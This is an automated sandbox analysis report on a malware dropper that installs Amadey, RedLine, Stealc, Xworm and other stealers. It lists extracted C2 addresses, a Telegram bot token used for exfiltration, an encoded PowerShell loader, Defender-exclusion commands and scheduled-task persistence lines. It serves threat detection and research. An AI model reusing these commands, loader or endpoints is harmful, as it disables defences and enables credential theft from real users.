Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
-
submitted
18-05-2024 02:29
General
-
Target
c22d167bf7d2d759794634e428006049754be141e56bec5db3a05a75d1917332.exe
-
Size
1.6MB
-
MD5
97c05214e6105bb765125f14b2c904f0
-
SHA1
4ad3aaf23969c1efa14d77fb22cb037ec956ebab
-
SHA256
c22d167bf7d2d759794634e428006049754be141e56bec5db3a05a75d1917332
-
SHA512
7c3960845f65dfaafe5d708ea9f6e351f5dd2ddaf774babf97090665720ca2898039865acbc6248519fcf27593494c1e35fea85ce9f562da5d6e017c6ba8abed
-
SSDEEP
49152:7bQePRi5+Som3Snq/3W3EEjL8/h28y2w1YiU:oep4SqfMEEH8528E1YiU
Malware Config
Extracted
amadey
4.20
18befc
http://5.42.96.141
-
install_dir
908f070dff
-
install_file
explorku.exe
-
strings_key
b25a9385246248a95c600f9a061438e1
-
url_paths
/go34ko8/index.php
Extracted
amadey
4.20
c767c0
http://5.42.96.7
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
Extracted
risepro
147.45.47.126:58709
Extracted
redline
@CLOUDYTTEAM
185.172.128.33:8970
Extracted
redline
1
185.215.113.67:26260
Extracted
stealc
zzvv
http://23.88.106.134
-
url_path
/c73eed764cc59dcb.php
Extracted
xworm
127.0.0.1:7000
beshomandotestbesnd.run.place:7000
-
Install_directory
%ProgramData%
-
install_file
taskmgr.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Extracted
redline
Vic
beshomandotestbesnd.run.place:1111
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Detect Xworm Payload 2 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 8 IoCs
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
-
SectopRAT payload 2 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
UAC bypass 3 TTPs 1 IoCs
-
Windows security bypass 2 TTPs 2 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Stops running service(s) 4 TTPs
-
.NET Reactor proctector 8 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 43 IoCs
-
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 3 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 34 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 5 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 55 IoCs
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c22d167bf7d2d759794634e428006049754be141e56bec5db3a05a75d1917332.exe"C:\Users\Admin\AppData\Local\Temp\c22d167bf7d2d759794634e428006049754be141e56bec5db3a05a75d1917332.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe"C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"7⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 38⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 3646⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClient7⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClient confirm7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLink7⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLink confirm7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLink7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "6⤵
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClientC7⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClientC confirm7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\sc.exeSc delete PiercingNetLink7⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove PiercingNetLink confirm7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start PiercingNetLink7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLinks7⤵
- Launches sc.exe
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLinks confirm7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLinks7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "6⤵
-
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"5⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA6⤵
- UAC bypass
- Windows security bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe" -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 1728⤵
- Program crash
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe"C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\system.exe"C:\ProgramData\system.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\system.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"7⤵
- Creates scheduled task(s)
-
C:\ProgramData\build.exe"C:\ProgramData\build.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 13806⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000014001\69302e0e34.exe"C:\Users\Admin\AppData\Local\Temp\1000014001\69302e0e34.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1036 -ip 10361⤵
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
-
C:\Windows\Temp\878778.exe"C:\Windows\Temp\878778.exe" --list-devices3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3500 -ip 35001⤵
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4952 -ip 49521⤵
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe1⤵
- Executes dropped EXE
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Scheduled Task/Job
1Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify Tools
2Modify Registry
4Virtualization/Sandbox Evasion
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\GameSyncLink\GameService.exeFilesize
288KB
MD5d9ec6f3a3b2ac7cd5eef07bd86e3efbc
SHA1e1908caab6f938404af85a7df0f80f877a4d9ee6
SHA256472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c
SHA5121b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exeFilesize
2.5MB
MD5e6943a08bb91fc3086394c7314be367d
SHA1451d2e171f906fa6c43f8b901cd41b0283d1fa40
SHA256aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873
SHA512505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exeFilesize
13.2MB
MD572b396a9053dff4d804e07ee1597d5e3
SHA15ec4fefa66771613433c17c11545c6161e1552d5
SHA256d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d
SHA512ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b
-
C:\Program Files (x86)\GameSyncLink\installc.batFilesize
301B
MD5998ab24316795f67c26aca0f1b38c8ce
SHA1a2a6dc94e08c086fe27f8c08cb8178e7a64f200d
